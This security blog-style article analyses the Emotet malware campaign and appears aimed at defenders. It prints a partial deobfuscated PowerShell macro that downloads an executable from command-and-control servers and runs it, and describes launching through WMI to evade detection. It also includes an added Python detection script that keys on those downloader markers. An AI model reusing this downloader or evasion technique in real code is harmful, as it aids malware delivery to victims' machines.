The rise of Emotet

What is Emotet

Emotet is multipurpose malware that is mainly distributed through spam emails. It was first spotted in 2014 and was designed to steal bank account details. Since then, there have been many different versions of the malware, which add other functionality such as malspam or the delivery of other types of malware such as TrickBot or Ryuk.

Emotet has been back since early September, infecting devices through botnet attacks that send out large quantities of emails. Emotet targets everyone, although lately much of the detected activity has been directed at countries such as Spain, Germany, Italy and England.

How Emotet works

The infection usually starts with a Microsoft Office document that runs a macro, which tries to download Emotet from compromised WordPress sites that act as Command & Control.
The following code block shows a deobfuscated macro:

$HVS084rA='------'; # obfuscated on purpose
$Yt3Nqui = '768'; # malware file will be named 768.exe
$zHmAqiz='------'; # obfuscated on purpose
$GpQtLHc=.('new-ob'+'je'+'ct') NeT.WebcLIent;
# Command and controls
foreach($Ej9owjPj in $t4Nj2JHD){
# downloads file from C2 and saves it as the previously defined name
$GpQtLHc."D`O`WNlOAdf`IlE"($Ej9owjPj, $FXYOYOI);
If ((.('Ge'+'t'+'-Item') $FXYOYOI)."LEn`G`Th" -ge 34897){
# Starts a process with the downloaded file

All the macros we’ve seen lately in Spain have the very same structure, although in the latest payloads we noticed that the string delimiter switched from @ to *. It is important to know that the payload is encoded in base64 and is invoked using PowerShell's -EncodedCommand parameter.

From the previous code block, we can see that the PowerShell process will try to download files from the C2 servers defined in the variable $t4Nj2JHD and start a process with the downloaded file, which is usually an executable.

To avoid chain-based detection, Emotet’s download process can instead be launched through the Windows Management Instrumentation Provider Host (WmiPrvSe.exe), while still executing the same encoded PowerShell command.
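An added example (not code from the original article) of how a defender could triage process-creation events for the behaviour described above: it decodes a PowerShell -EncodedCommand argument, undoes the backtick and string-splitting obfuscation seen in the macro, and flags downloader markers together with a WmiPrvSe.exe or Office parent. The event schema (parent, cmdline), the function names and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Parents the article ties to the download step: the Office macro host and WMI.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "wmiprvse.exe"}
# Downloader markers taken from the article's deobfuscated macro (lower-cased).
MARKERS = ("new-object", "net.webclient", "downloadfile")
# Any "-name value" pair whose value looks like base64.
ARG = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/=]{8,})")

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    for m in ARG.finditer(cmdline):
        name = m.group(1).lower()
        # powershell.exe accepts -EncodedCommand prefixes (-e, -enc, ...) and -ec.
        if "encodedcommand".startswith(name) or name == "ec":
            try:  # the payload is base64 over UTF-16LE text
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:
                return None
    return None

def normalize(script):
    """Undo backtick escapes and 'a'+'b' literal splitting, then lower-case."""
    script = script.replace("`", "")
    return re.sub(r"['\"]\s*\+\s*['\"]", "", script).lower()

def triage(event):
    """Return the reasons an event is suspicious; an empty list means no hit."""
    script = decode_encoded_command(event["cmdline"])
    if script is None:
        return []
    reasons = ["encoded-command"]
    text = normalize(script)
    reasons += [f"marker:{m}" for m in MARKERS if m in text]
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        reasons.append("parent:" + event["parent"].lower())
    return reasons

# Constructed sample: two lines copied from the macro above in a hypothetical log schema.
SAMPLE_SCRIPT = r"""$GpQtLHc=.('new-ob'+'je'+'ct') NeT.WebcLIent;
$GpQtLHc."D`O`WNlOAdf`IlE"($Ej9owjPj, $FXYOYOI);"""
B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
EVENTS = [
    {"parent": "WmiPrvSe.exe", "cmdline": "powershell -w hidden -enco " + B64},
    {"parent": "explorer.exe", "cmdline": "powershell -ExecutionPolicy RemoteSigned -File b.ps1"},
]
if __name__ == "__main__":
    print([triage(ev) for ev in EVENTS])
```

The marker match only works after normalization, which is why a plain string search for "DownloadFile" over raw command lines misses this macro.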

The downloaded malicious executables are usually located at the root of the user folder with three-digit names, like 768.exe in the previous code block. It is also possible to find more dropped malware in the System32 and SysWOW64 folders, or Trickbot and other generic malware in a newly generated folder in AppData.

How to protect yourself from Emotet

The currently active Emotet malware campaign has impacted many organizations and individuals, and once a device is infected, Emotet spreads to other devices. This campaign is supported by at least two different groups and the payload is being actively updated from time to time.

To protect your infrastructure against these attacks, you should consider the following actions:

  • Actively monitor your devices with an EDR solution that monitors the usage of encoded PowerShell commands or that can block the usage of unwanted macros.
  • The malware may have virtual machine detection, so it is recommended to analyze files in depth before being confident that they are not malware.
  • The malware is continuously being updated, so it is important to keep track of its behavior. Your software should be up to date with the latest patches.
  • Use strong passwords in all your systems and enforce a password policy. Once a device is infected, the malware may try to brute force other systems with a list of known passwords.
  • Block and monitor known malicious and compromised domains in your network perimeter.
  • Ensure that end users operate with the lowest level of privilege.
  • Train employees on phishing attacks and how to detect them.
  • Define procedures to isolate and analyze any possibly infected device.